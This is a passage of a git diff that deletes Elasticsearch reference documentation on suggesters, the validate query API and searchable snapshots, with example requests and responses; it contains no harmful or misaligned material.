-`geo` contexts can be explicitly set with suggestions or be indexed from a geo point field in the -document via the `path` parameter, similar to `category` contexts. Associating multiple geo location context -with a suggestion, will index the suggestion for every geo location. The following indexes a suggestion -with two geo location contexts: - -[source,console] --------------------------------------------------- -PUT place/_doc/1 -{ - "suggest": { - "input": "timmy's", - "contexts": { - "location": [ - { - "lat": 43.6624803, - "lon": -79.3863353 - }, - { - "lat": 43.6624718, - "lon": -79.3873227 - } - ] - } - } -} --------------------------------------------------- - -[discrete] -====== Geo location Query - -Suggestions can be filtered and boosted with respect to how close they are to one or -more geo points. The following filters suggestions that fall within the area represented by -the encoded geohash of a geo point: - -[source,console] --------------------------------------------------- -POST place/_search -{ - "suggest": { - "place_suggestion": { - "prefix": "tim", - "completion": { - "field": "suggest", - "size": 10, - "contexts": { - "location": { - "lat": 43.662, - "lon": -79.380 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -NOTE: When a location with a lower precision at query time is specified, all suggestions -that fall within the area will be considered. - -NOTE: If multiple categories or category contexts are set on the query -they are merged as a disjunction. This means that suggestions match -if they contain at least one of the provided context values. - -Suggestions that are within an area represented by a geohash can also be boosted higher -than others, as shown by the following: - -[source,console] --------------------------------------------------- -POST place/_search?pretty -{ - "suggest": { - "place_suggestion": { - "prefix": "tim", - "completion": { - "field": "suggest", - "size": 10, - "contexts": { - "location": [ <1> - { - "lat": 43.6624803, - "lon": -79.3863353, - "precision": 2 - }, - { - "context": { - "lat": 43.6624803, - "lon": -79.3863353 - }, - "boost": 2 - } - ] - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The context query filters for suggestions that fall under - the geo location represented by a geohash of '(43.662, -79.380)' - with a precision of '2' and boosts suggestions - that fall under the geohash representation of '(43.6624803, -79.3863353)' - with a default precision of '6' by a factor of `2` - -NOTE: If a suggestion entry matches multiple contexts the final score is computed as the -maximum score produced by any matching contexts. - -In addition to accepting context values, a context query can be composed of -multiple context clauses. The following parameters are supported for a -`geo` context clause: - -[horizontal] -`context`:: - A geo point object or a geo hash string to filter or - boost the suggestion by. This is mandatory. - -`boost`:: - The factor by which the score of the suggestion - should be boosted, the score is computed by - multiplying the boost with the suggestion weight, - defaults to `1` - -`precision`:: - The precision of the geohash to encode the query geo point. - This can be specified as a distance value (`5m`, `10km` etc.), - or as a raw geohash precision (`1`..`12`). - Defaults to index time precision level. - -`neighbours`:: - Accepts an array of precision values at which - neighbouring geohashes should be taken into account. - precision value can be a distance value (`5m`, `10km` etc.) - or a raw geohash precision (`1`..`12`). Defaults to - generating neighbours for index time precision level. diff --git a/docs/reference/search/suggesters/misc.asciidoc b/docs/reference/search/suggesters/misc.asciidoc deleted file mode 100644 index b32dffbab54..00000000000 --- a/docs/reference/search/suggesters/misc.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ -[[return-suggesters-type]] -==== Returning the type of the suggester - -Sometimes you need to know the exact type of a suggester in order to parse its results. The `typed_keys` parameter - can be used to change the suggester's name in the response so that it will be prefixed by its type. - -Considering the following example with two suggesters `term` and `phrase`: - -[source,console] --------------------------------------------------- -POST _search?typed_keys -{ - "suggest": { - "text" : "some test mssage", - "my-first-suggester" : { - "term" : { - "field" : "message" - } - }, - "my-second-suggester" : { - "phrase" : { - "field" : "message" - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -In the response, the suggester names will be changed to respectively `term#my-first-suggester` and -`phrase#my-second-suggester`, reflecting the types of each suggestion: - -[source,console-result] --------------------------------------------------- -{ - "suggest": { - "term#my-first-suggester": [ <1> - { - "text": "some", - "offset": 0, - "length": 4, - "options": [] - }, - { - "text": "test", - "offset": 5, - "length": 4, - "options": [] - }, - { - "text": "mssage", - "offset": 10, - "length": 6, - "options": [ - { - "text": "message", - "score": 0.8333333, - "freq": 4 - } - ] - } - ], - "phrase#my-second-suggester": [ <2> - { - "text": "some test mssage", - "offset": 0, - "length": 16, - "options": [ - { - "text": "some test message", - "score": 0.030227963 - } - ] - } - ] - }, - ... -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": "$body.took", "timed_out": false, "_shards": "$body._shards", "hits": "$body.hits"/] -// TESTRESPONSE[s/"score": 0.8333333/"score": $body.suggest.term#my-first-suggester.2.options.0.score/] -// TESTRESPONSE[s/"score": 0.030227963/"score": $body.suggest.phrase#my-second-suggester.0.options.0.score/] - -<1> The name `my-first-suggester` now contains the `term` prefix. -<2> The name `my-second-suggester` now contains the `phrase` prefix. diff --git a/docs/reference/search/suggesters/phrase-suggest.asciidoc b/docs/reference/search/suggesters/phrase-suggest.asciidoc deleted file mode 100644 index e7428b54892..00000000000 --- a/docs/reference/search/suggesters/phrase-suggest.asciidoc +++ /dev/null @@ -1,441 +0,0 @@ -[[phrase-suggester]] -==== Phrase Suggester - -NOTE: In order to understand the format of suggestions, please -read the <> page first. - -The `term` suggester provides a very convenient API to access word -alternatives on a per token basis within a certain string distance. The API -allows accessing each token in the stream individually while -suggest-selection is left to the API consumer. Yet, often pre-selected -suggestions are required in order to present to the end-user. The -`phrase` suggester adds additional logic on top of the `term` suggester -to select entire corrected phrases instead of individual tokens weighted -based on `ngram-language` models. In practice this suggester will be -able to make better decisions about which tokens to pick based on -co-occurrence and frequencies. - -===== API Example - -In general the `phrase` suggester requires special mapping up front to work. -The `phrase` suggester examples on this page need the following mapping to -work. The `reverse` analyzer is used only in the last example. - -[source,console] --------------------------------------------------- -PUT test -{ - "settings": { - "index": { - "number_of_shards": 1, - "analysis": { - "analyzer": { - "trigram": { - "type": "custom", - "tokenizer": "standard", - "filter": ["lowercase","shingle"] - }, - "reverse": { - "type": "custom", - "tokenizer": "standard", - "filter": ["lowercase","reverse"] - } - }, - "filter": { - "shingle": { - "type": "shingle", - "min_shingle_size": 2, - "max_shingle_size": 3 - } - } - } - } - }, - "mappings": { - "properties": { - "title": { - "type": "text", - "fields": { - "trigram": { - "type": "text", - "analyzer": "trigram" - }, - "reverse": { - "type": "text", - "analyzer": "reverse" - } - } - } - } - } -} -POST test/_doc?refresh=true -{"title": "noble warriors"} -POST test/_doc?refresh=true -{"title": "nobel prize"} --------------------------------------------------- -// TESTSETUP - -Once you have the analyzers and mappings set up you can use the `phrase` -suggester in the same spot you'd use the `term` suggester: - -[source,console] --------------------------------------------------- -POST test/_search -{ - "suggest": { - "text": "noble prize", - "simple_phrase": { - "phrase": { - "field": "title.trigram", - "size": 1, - "gram_size": 3, - "direct_generator": [ { - "field": "title.trigram", - "suggest_mode": "always" - } ], - "highlight": { - "pre_tag": "", - "post_tag": "" - } - } - } - } -} --------------------------------------------------- - -The response contains suggestions scored by the most likely spelling correction first. In this case we received the expected correction "nobel prize". - -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "hits": ... - "timed_out": false, - "took": 3, - "suggest": { - "simple_phrase" : [ - { - "text" : "noble prize", - "offset" : 0, - "length" : 11, - "options" : [ { - "text" : "nobel prize", - "highlighted": "nobel prize", - "score" : 0.48614594 - }] - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": .../"_shards": "$body._shards",/] -// TESTRESPONSE[s/"hits": .../"hits": "$body.hits",/] -// TESTRESPONSE[s/"took": 3,/"took": "$body.took",/] - -===== Basic Phrase suggest API parameters - -[horizontal] -`field`:: - The name of the field used to do n-gram lookups for the - language model, the suggester will use this field to gain statistics to - score corrections. This field is mandatory. - -`gram_size`:: - Sets max size of the n-grams (shingles) in the `field`. - If the field doesn't contain n-grams (shingles), this should be omitted - or set to `1`. Note that Elasticsearch tries to detect the gram size - based on the specified `field`. If the field uses a `shingle` filter, the - `gram_size` is set to the `max_shingle_size` if not explicitly set. - -`real_word_error_likelihood`:: - The likelihood of a term being - misspelled even if the term exists in the dictionary. The default is - `0.95`, meaning 5% of the real words are misspelled. - - -`confidence`:: - The confidence level defines a factor applied to the - input phrases score which is used as a threshold for other suggest - candidates. Only candidates that score higher than the threshold will be - included in the result. For instance a confidence level of `1.0` will - only return suggestions that score higher than the input phrase. If set - to `0.0` the top N candidates are returned. The default is `1.0`. - -`max_errors`:: - The maximum percentage of the terms - considered to be misspellings in order to form a correction. This method - accepts a float value in the range `[0..1)` as a fraction of the actual - query terms or a number `>=1` as an absolute number of query terms. The - default is set to `1.0`, meaning only corrections with - at most one misspelled term are returned. Note that setting this too high - can negatively impact performance. Low values like `1` or `2` are recommended; - otherwise the time spend in suggest calls might exceed the time spend in - query execution. - -`separator`:: - The separator that is used to separate terms in the - bigram field. If not set the whitespace character is used as a - separator. - -`size`:: - The number of candidates that are generated for each - individual query term. Low numbers like `3` or `5` typically produce good - results. Raising this can bring up terms with higher edit distances. The - default is `5`. - -`analyzer`:: - Sets the analyzer to analyze to suggest text with. - Defaults to the search analyzer of the suggest field passed via `field`. - -`shard_size`:: - Sets the maximum number of suggested terms to be - retrieved from each individual shard. During the reduce phase, only the - top N suggestions are returned based on the `size` option. Defaults to - `5`. - -`text`:: - Sets the text / query to provide suggestions for. - -`highlight`:: - Sets up suggestion highlighting. If not provided then - no `highlighted` field is returned. If provided must - contain exactly `pre_tag` and `post_tag`, which are - wrapped around the changed tokens. If multiple tokens - in a row are changed the entire phrase of changed tokens - is wrapped rather than each token. - -`collate`:: - Checks each suggestion against the specified `query` to prune suggestions - for which no matching docs exist in the index. The collate query for a - suggestion is run only on the local shard from which the suggestion has - been generated from. The `query` must be specified and it can be templated, - see <> for more information. - The current suggestion is automatically made available as the `{{suggestion}}` - variable, which should be used in your query. You can still specify - your own template `params` -- the `suggestion` value will be added to the - variables you specify. Additionally, you can specify a `prune` to control - if all phrase suggestions will be returned; when set to `true` the suggestions - will have an additional option `collate_match`, which will be `true` if - matching documents for the phrase was found, `false` otherwise. - The default value for `prune` is `false`. - -[source,console] --------------------------------------------------- -POST test/_search -{ - "suggest": { - "text" : "noble prize", - "simple_phrase" : { - "phrase" : { - "field" : "title.trigram", - "size" : 1, - "direct_generator" : [ { - "field" : "title.trigram", - "suggest_mode" : "always", - "min_word_length" : 1 - } ], - "collate": { - "query": { <1> - "source" : { - "match": { - "{{field_name}}" : "{{suggestion}}" <2> - } - } - }, - "params": {"field_name" : "title"}, <3> - "prune": true <4> - } - } - } - } -} --------------------------------------------------- - -<1> This query will be run once for every suggestion. -<2> The `{{suggestion}}` variable will be replaced by the text - of each suggestion. -<3> An additional `field_name` variable has been specified in - `params` and is used by the `match` query. -<4> All suggestions will be returned with an extra `collate_match` - option indicating whether the generated phrase matched any - document. - -===== Smoothing Models - -The `phrase` suggester supports multiple smoothing models to balance -weight between infrequent grams (grams (shingles) are not existing in -the index) and frequent grams (appear at least once in the index). The -smoothing model can be selected by setting the `smoothing` parameter -to one of the following options. Each smoothing model supports specific -properties that can be configured. - -[horizontal] -`stupid_backoff`:: - A simple backoff model that backs off to lower - order n-gram models if the higher order count is `0` and discounts the - lower order n-gram model by a constant factor. The default `discount` is - `0.4`. Stupid Backoff is the default model. - -`laplace`:: - A smoothing model that uses an additive smoothing where a - constant (typically `1.0` or smaller) is added to all counts to balance - weights. The default `alpha` is `0.5`. - -`linear_interpolation`:: - A smoothing model that takes the weighted - mean of the unigrams, bigrams, and trigrams based on user supplied - weights (lambdas). Linear Interpolation doesn't have any default values. - All parameters (`trigram_lambda`, `bigram_lambda`, `unigram_lambda`) - must be supplied. - -[source,console] --------------------------------------------------- -POST test/_search -{ - "suggest": { - "text" : "obel prize", - "simple_phrase" : { - "phrase" : { - "field" : "title.trigram", - "size" : 1, - "smoothing" : { - "laplace" : { - "alpha" : 0.7 - } - } - } - } - } -} --------------------------------------------------- - -===== Candidate Generators - -The `phrase` suggester uses candidate generators to produce a list of -possible terms per term in the given text. A single candidate generator -is similar to a `term` suggester called for each individual term in the -text. The output of the generators is subsequently scored in combination -with the candidates from the other terms for suggestion candidates. - -Currently only one type of candidate generator is supported, the -`direct_generator`. The Phrase suggest API accepts a list of generators -under the key `direct_generator`; each of the generators in the list is -called per term in the original text. - -===== Direct Generators - -The direct generators support the following parameters: - -[horizontal] -`field`:: - The field to fetch the candidate suggestions from. This is - a required option that either needs to be set globally or per - suggestion. - -`size`:: - The maximum corrections to be returned per suggest text token. - -`suggest_mode`:: - The suggest mode controls what suggestions are included on the suggestions - generated on each shard. All values other than `always` can be thought of - as an optimization to generate fewer suggestions to test on each shard and - are not rechecked when combining the suggestions generated on each - shard. Thus `missing` will generate suggestions for terms on shards that do - not contain them even if other shards do contain them. Those should be - filtered out using `confidence`. Three possible values can be specified: - ** `missing`: Only generate suggestions for terms that are not in the - shard. This is the default. - ** `popular`: Only suggest terms that occur in more docs on the shard than - the original term. - ** `always`: Suggest any matching suggestions based on terms in the - suggest text. - -`max_edits`:: - The maximum edit distance candidate suggestions can have - in order to be considered as a suggestion. Can only be a value between 1 - and 2. Any other value results in a bad request error being thrown. - Defaults to 2. - -`prefix_length`:: - The number of minimal prefix characters that must - match in order be a candidate suggestions. Defaults to 1. Increasing - this number improves spellcheck performance. Usually misspellings don't - occur in the beginning of terms. (Old name "prefix_len" is deprecated) - -`min_word_length`:: - The minimum length a suggest text term must have in - order to be included. Defaults to 4. (Old name "min_word_len" is deprecated) - -`max_inspections`:: - A factor that is used to multiply with the - `shards_size` in order to inspect more candidate spelling corrections on - the shard level. Can improve accuracy at the cost of performance. - Defaults to 5. - -`min_doc_freq`:: - The minimal threshold in number of documents a - suggestion should appear in. This can be specified as an absolute number - or as a relative percentage of number of documents. This can improve - quality by only suggesting high frequency terms. Defaults to 0f and is - not enabled. If a value higher than 1 is specified, then the number - cannot be fractional. The shard level document frequencies are used for - this option. - -`max_term_freq`:: - The maximum threshold in number of documents in which a - suggest text token can exist in order to be included. Can be a relative - percentage number (e.g., 0.4) or an absolute number to represent document - frequencies. If a value higher than 1 is specified, then fractional can - not be specified. Defaults to 0.01f. This can be used to exclude high - frequency terms -- which are usually spelled correctly -- from being spellchecked. This also improves the spellcheck - performance. The shard level document frequencies are used for this - option. - -`pre_filter`:: - A filter (analyzer) that is applied to each of the - tokens passed to this candidate generator. This filter is applied to the - original token before candidates are generated. - -`post_filter`:: - A filter (analyzer) that is applied to each of the - generated tokens before they are passed to the actual phrase scorer. - -The following example shows a `phrase` suggest call with two generators: -the first one is using a field containing ordinary indexed terms, and the -second one uses a field that uses terms indexed with a `reverse` filter -(tokens are index in reverse order). This is used to overcome the limitation -of the direct generators to require a constant prefix to provide -high-performance suggestions. The `pre_filter` and `post_filter` options -accept ordinary analyzer names. - -[source,console] --------------------------------------------------- -POST test/_search -{ - "suggest": { - "text" : "obel prize", - "simple_phrase" : { - "phrase" : { - "field" : "title.trigram", - "size" : 1, - "direct_generator" : [ { - "field" : "title.trigram", - "suggest_mode" : "always" - }, { - "field" : "title.reverse", - "suggest_mode" : "always", - "pre_filter" : "reverse", - "post_filter" : "reverse" - } ] - } - } - } -} --------------------------------------------------- - -`pre_filter` and `post_filter` can also be used to inject synonyms after -candidates are generated. For instance for the query `captain usq` we -might generate a candidate `usa` for the term `usq`, which is a synonym for -`america`. This allows us to present `captain america` to the user if this -phrase scores high enough. diff --git a/docs/reference/search/suggesters/term-suggest.asciidoc b/docs/reference/search/suggesters/term-suggest.asciidoc deleted file mode 100644 index 43d91ce164f..00000000000 --- a/docs/reference/search/suggesters/term-suggest.asciidoc +++ /dev/null @@ -1,119 +0,0 @@ -[[term-suggester]] -==== Term suggester - -NOTE: In order to understand the format of suggestions, please -read the <> page first. - -The `term` suggester suggests terms based on edit distance. The provided -suggest text is analyzed before terms are suggested. The suggested terms -are provided per analyzed suggest text token. The `term` suggester -doesn't take the query into account that is part of request. - -===== Common suggest options: - -[horizontal] -`text`:: - The suggest text. The suggest text is a required option that - needs to be set globally or per suggestion. - -`field`:: - The field to fetch the candidate suggestions from. This is - a required option that either needs to be set globally or per - suggestion. - -`analyzer`:: - The analyzer to analyse the suggest text with. Defaults - to the search analyzer of the suggest field. - -`size`:: - The maximum corrections to be returned per suggest text - token. - -`sort`:: - Defines how suggestions should be sorted per suggest text - term. Two possible values: -+ - ** `score`: Sort by score first, then document frequency and - then the term itself. - ** `frequency`: Sort by document frequency first, then similarity - score and then the term itself. -+ -`suggest_mode`:: - The suggest mode controls what suggestions are - included or controls for what suggest text terms, suggestions should be - suggested. Three possible values can be specified: -+ - ** `missing`: Only provide suggestions for suggest text terms that are - not in the index. This is the default. - ** `popular`: Only suggest suggestions that occur in more docs than - the original suggest text term. - ** `always`: Suggest any matching suggestions based on terms in the - suggest text. - -===== Other term suggest options: - -[horizontal] -`max_edits`:: - The maximum edit distance candidate suggestions can - have in order to be considered as a suggestion. Can only be a value - between 1 and 2. Any other value results in a bad request error being - thrown. Defaults to 2. - -`prefix_length`:: - The number of minimal prefix characters that must - match in order be a candidate for suggestions. Defaults to 1. Increasing - this number improves spellcheck performance. Usually misspellings don't - occur in the beginning of terms. (Old name "prefix_len" is deprecated) - -`min_word_length`:: - The minimum length a suggest text term must have in - order to be included. Defaults to 4. (Old name "min_word_len" is deprecated) - -`shard_size`:: - Sets the maximum number of suggestions to be retrieved - from each individual shard. During the reduce phase only the top N - suggestions are returned based on the `size` option. Defaults to the - `size` option. Setting this to a value higher than the `size` can be - useful in order to get a more accurate document frequency for spelling - corrections at the cost of performance. Due to the fact that terms are - partitioned amongst shards, the shard level document frequencies of - spelling corrections may not be precise. Increasing this will make these - document frequencies more precise. - -`max_inspections`:: - A factor that is used to multiply with the - `shards_size` in order to inspect more candidate spelling corrections on - the shard level. Can improve accuracy at the cost of performance. - Defaults to 5. - -`min_doc_freq`:: - The minimal threshold in number of documents a - suggestion should appear in. This can be specified as an absolute number - or as a relative percentage of number of documents. This can improve - quality by only suggesting high frequency terms. Defaults to 0f and is - not enabled. If a value higher than 1 is specified, then the number - cannot be fractional. The shard level document frequencies are used for - this option. - -`max_term_freq`:: - The maximum threshold in number of documents in which a - suggest text token can exist in order to be included. Can be a relative - percentage number (e.g., 0.4) or an absolute number to represent document - frequencies. If a value higher than 1 is specified, then fractional can - not be specified. Defaults to 0.01f. This can be used to exclude high - frequency terms -- which are usually spelled correctly -- from being spellchecked. - This also improves the spellcheck performance. The shard level document frequencies - are used for this option. - -`string_distance`:: - Which string distance implementation to use for comparing how similar - suggested terms are. Five possible values can be specified: - - ** `internal`: The default based on damerau_levenshtein but highly optimized - for comparing string distance for terms inside the index. - ** `damerau_levenshtein`: String distance algorithm based on - Damerau-Levenshtein algorithm. - ** `levenshtein`: String distance algorithm based on Levenshtein edit distance - algorithm. - ** `jaro_winkler`: String distance algorithm based on Jaro-Winkler algorithm. - ** `ngram`: String distance algorithm based on character n-grams. diff --git a/docs/reference/search/validate.asciidoc b/docs/reference/search/validate.asciidoc deleted file mode 100644 index 624fd039af3..00000000000 --- a/docs/reference/search/validate.asciidoc +++ /dev/null @@ -1,295 +0,0 @@ -[[search-validate]] -=== Validate API - -Validates a potentially expensive query without executing it. - -[source,console] --------------------------------------------------- -GET my-index-000001/_validate/query?q=user.id:kimchy --------------------------------------------------- -// TEST[setup:my_index] - - -[[search-validate-api-request]] -==== {api-request-title} - -`GET //_validate/` - - -[[search-validate-api-desc]] -==== {api-description-title} - -The validate API allows you to validate a potentially expensive query -without executing it. The query can be sent either as a path parameter or in the -request body. - - -[[search-validate-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to search. -Wildcard (`*`) expressions are supported. -+ -To search all data streams or indices in a cluster, omit this parameter or use -`_all` or `*`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=query] - - -[[search-validate-api-query-params]] -==== {api-query-parms-title} - -`all_shards`:: - (Optional, Boolean) If `true`, the validation is executed on all shards - instead of one random shard per index. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyzer] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyze_wildcard] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=default_operator] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=df] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] - -`explain`:: - (Optional, Boolean) If `true`, the response returns detailed information if an - error has occurred. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=lenient] - -`rewrite`:: - (Optional, Boolean) If `true`, returns a more detailed explanation showing the - actual Lucene query that will be executed. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-q] - - -[[search-validate-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT my-index-000001/_bulk?refresh -{"index":{"_id":1}} -{"user" : { "id": "kimchy" }, "@timestamp" : "2099-11-15T14:12:12", "message" : "trying out Elasticsearch"} -{"index":{"_id":2}} -{"user" : { "id": "kimchi" }, "@timestamp" : "2099-11-15T14:12:13", "message" : "My user ID is similar to kimchy!"} --------------------------------------------------- - - -When sent a valid query: - -[source,console] --------------------------------------------------- -GET my-index-000001/_validate/query?q=user.id:kimchy --------------------------------------------------- -// TEST[continued] - - -The response contains `valid:true`: - -[source,console-result] --------------------------------------------------- -{"valid":true,"_shards":{"total":1,"successful":1,"failed":0}} --------------------------------------------------- - - -The query may also be sent in the request body: - -[source,console] --------------------------------------------------- -GET my-index-000001/_validate/query -{ - "query" : { - "bool" : { - "must" : { - "query_string" : { - "query" : "*:*" - } - }, - "filter" : { - "term" : { "user.id" : "kimchy" } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -NOTE: The query being sent in the body must be nested in a `query` key, same as -the <> works - -If the query is invalid, `valid` will be `false`. Here the query is invalid -because {es} knows the `post_date` field should be a date due to dynamic -mapping, and 'foo' does not correctly parse into a date: - -[source,console] --------------------------------------------------- -GET my-index-000001/_validate/query -{ - "query": { - "query_string": { - "query": "@timestamp:foo", - "lenient": false - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{"valid":false,"_shards":{"total":1,"successful":1,"failed":0}} --------------------------------------------------- - -===== The explain parameter - -An `explain` parameter can be specified to get more detailed information about -why a query failed: - -[source,console] --------------------------------------------------- -GET my-index-000001/_validate/query?explain=true -{ - "query": { - "query_string": { - "query": "@timestamp:foo", - "lenient": false - } - } -} --------------------------------------------------- -// TEST[continued] - - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "valid" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "failed" : 0 - }, - "explanations" : [ { - "index" : "my-index-000001", - "valid" : false, - "error" : "my-index-000001/IAEc2nIXSSunQA_suI0MLw] QueryShardException[failed to create query:...failed to parse date field [foo]" - } ] -} --------------------------------------------------- -// TESTRESPONSE[s/"error" : "[^\"]+"/"error": "$body.explanations.0.error"/] - -===== The rewrite parameter - -When the query is valid, the explanation defaults to the string representation -of that query. With `rewrite` set to `true`, the explanation is more detailed -showing the actual Lucene query that will be executed. - -[source,console] --------------------------------------------------- -GET my-index-000001/_validate/query?rewrite=true -{ - "query": { - "more_like_this": { - "like": { - "_id": "2" - }, - "boost_terms": 1 - } - } -} --------------------------------------------------- -// TEST[skip:the output is randomized depending on which shard we hit] - - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "valid": true, - "_shards": { - "total": 1, - "successful": 1, - "failed": 0 - }, - "explanations": [ - { - "index": "my-index-000001", - "valid": true, - "explanation": "((user:terminator^3.71334 plot:future^2.763601 plot:human^2.8415773 plot:sarah^3.4193945 plot:kyle^3.8244398 plot:cyborg^3.9177752 plot:connor^4.040236 plot:reese^4.7133346 ... )~6) -ConstantScore(_id:2)) #(ConstantScore(_type:_doc))^0.0" - } - ] -} --------------------------------------------------- - - -===== Rewrite and all_shards parameters - -By default, the request is executed on a single shard only, which is randomly -selected. The detailed explanation of the query may depend on which shard is -being hit, and therefore may vary from one request to another. So, in case of -query rewrite the `all_shards` parameter should be used to get response from -all available shards. - -//// -[source,console] --------------------------------------------------- -PUT my-index-000001/_bulk?refresh -{"index":{"_id":1}} -{"user" : { "id": "kimchy" }, "@timestamp" : "2099-11-15T14:12:12", "message" : "trying out Elasticsearch"} -{"index":{"_id":2}} -{"user" : { "id": "kimchi" }, "@timestamp" : "2099-11-15T14:12:13", "message" : "My user ID is similar to kimchy!"} --------------------------------------------------- -//// - -[source,console] --------------------------------------------------- -GET my-index-000001/_validate/query?rewrite=true&all_shards=true -{ - "query": { - "match": { - "user.id": { - "query": "kimchy", - "fuzziness": "auto" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "valid": true, - "_shards": { - "total": 1, - "successful": 1, - "failed": 0 - }, - "explanations": [ - { - "index": "my-index-000001", - "shard": 0, - "valid": true, - "explanation": "(user.id:kimchi)^0.8333333 user.id:kimchy" - } - ] -} --------------------------------------------------- diff --git a/docs/reference/searchable-snapshots/apis/mount-snapshot.asciidoc b/docs/reference/searchable-snapshots/apis/mount-snapshot.asciidoc deleted file mode 100644 index 4b8f12d59c3..00000000000 --- a/docs/reference/searchable-snapshots/apis/mount-snapshot.asciidoc +++ /dev/null @@ -1,128 +0,0 @@ -[role="xpack"] -[testenv="enterprise"] -[[searchable-snapshots-api-mount-snapshot]] -=== Mount snapshot API -++++ -Mount snapshot -++++ - -beta::[] - -Mount a snapshot as a searchable snapshot index. - -[[searchable-snapshots-api-mount-request]] -==== {api-request-title} - -`POST /_snapshot///_mount` - -[[searchable-snapshots-api-mount-prereqs]] -==== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the -`manage` cluster privilege and the `manage` index privilege -for any included indices to use this API. -For more information, see <>. - -[[searchable-snapshots-api-mount-desc]] -==== {api-description-title} - - -[[searchable-snapshots-api-mount-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -The name of the repository containing -the snapshot of the index to mount. - -``:: -(Required, string) -The name of the snapshot of the index -to mount. - -[[searchable-snapshots-api-mount-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -`wait_for_completion`:: -(Optional, Boolean) If `true`, the request blocks until the operation is complete. -Defaults to `false`. - -[[searchable-snapshots-api-mount-request-body]] -==== {api-request-body-title} - -`index`:: -(Required, string) -Name of the index contained in the snapshot -whose data is to be mounted. - -If no `renamed_index` is specified this name -will also be used to create the new index. - -`renamed_index`:: -+ --- -(Optional, string) -Name of the index that will be created. --- - -`index_settings`:: -+ --- -(Optional, object) -Settings that should be added to the index when it is mounted. --- - -`ignore_index_settings`:: -+ --- -(Optional, array of strings) -Names of settings that should be removed from the index when it is mounted. --- - -[[searchable-snapshots-api-mount-example]] -==== {api-examples-title} -//// -[source,console] ------------------------------------ -PUT /my_docs -{ - "settings" : { - "index.number_of_shards" : 1, - "index.number_of_replicas" : 0 - } -} - -PUT /_snapshot/my_repository/my_snapshot?wait_for_completion=true -{ - "include_global_state": false, - "indices": "my_docs" -} - -DELETE /my_docs ------------------------------------ -// TEST[setup:setup-repository] -//// - -Mounts the index `my_docs` from an existing snapshot named `my_snapshot` stored -in the `my_repository` as a new index `docs`: - -[source,console] --------------------------------------------------- -POST /_snapshot/my_repository/my_snapshot/_mount?wait_for_completion=true -{ - "index": "my_docs", <1> - "renamed_index": "docs", <2> - "index_settings": { <3> - "index.number_of_replicas": 0 - }, - "ignored_index_settings": [ "index.refresh_interval" ] <4> -} --------------------------------------------------- -// TEST[continued] - -<1> The name of the index in the snapshot to mount -<2> The name of the index to create -<3> Any index settings to add to the new index -<4> List of indices to ignore when mounting the snapshotted index diff --git a/docs/reference/searchable-snapshots/apis/searchable-snapshots-apis.asciidoc b/docs/reference/searchable-snapshots/apis/searchable-snapshots-apis.asciidoc deleted file mode 100644 index 1cdf2834a34..00000000000 --- a/docs/reference/searchable-snapshots/apis/searchable-snapshots-apis.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[role="xpack"] -[testenv="enterprise"] -[[searchable-snapshots-apis]] -== Searchable snapshots APIs - -beta::[] - -You can use the following APIs to perform searchable snapshots operations. - -* <> - -include::mount-snapshot.asciidoc[] diff --git a/docs/reference/searchable-snapshots/index.asciidoc b/docs/reference/searchable-snapshots/index.asciidoc deleted file mode 100644 index c2d6b3e109c..00000000000 --- a/docs/reference/searchable-snapshots/index.asciidoc +++ /dev/null @@ -1,100 +0,0 @@ -[[searchable-snapshots]] -== {search-snaps-cap} - -beta::[] - -{search-snaps-cap} let you reduce your operating costs by using -<> for resiliency rather than maintaining -<> within a cluster. When you mount an index from a -snapshot as a {search-snap}, {es} copies the index shards to local storage -within the cluster. This ensures that search performance is comparable to -searching any other index, and minimizes the need to access the snapshot -repository. Should a node fail, shards of a {search-snap} index are -automatically recovered from the snapshot repository. - -This can result in significant cost savings for less frequently searched data. -With {search-snaps}, you no longer need an extra index shard copy to avoid data -loss, potentially halving the node local storage capacity necessary for -searching that data. Because {search-snaps} rely on the same snapshot mechanism -you use for backups, they have a minimal impact on your snapshot repository -storage costs. - -[discrete] -[[using-searchable-snapshots]] -=== Using {search-snaps} - -Searching a {search-snap} index is the same as searching any other index. -Search performance is comparable to regular indices because the shard data is -copied onto nodes in the cluster when the {search-snap} is mounted. - -By default, {search-snap} indices have no replicas. The underlying snapshot -provides resilience and the query volume is expected to be low enough that a -single shard copy will be sufficient. However, if you need to support a higher -query volume, you can add replicas by adjusting the `index.number_of_replicas` -index setting. - -If a node fails and {search-snap} shards need to be restored from the snapshot, -there is a brief window of time while {es} allocates the shards to other nodes -where the cluster health will not be `green`. Searches that hit these shards -will fail or return partial results until they are reallocated. - -You typically manage {search-snaps} through 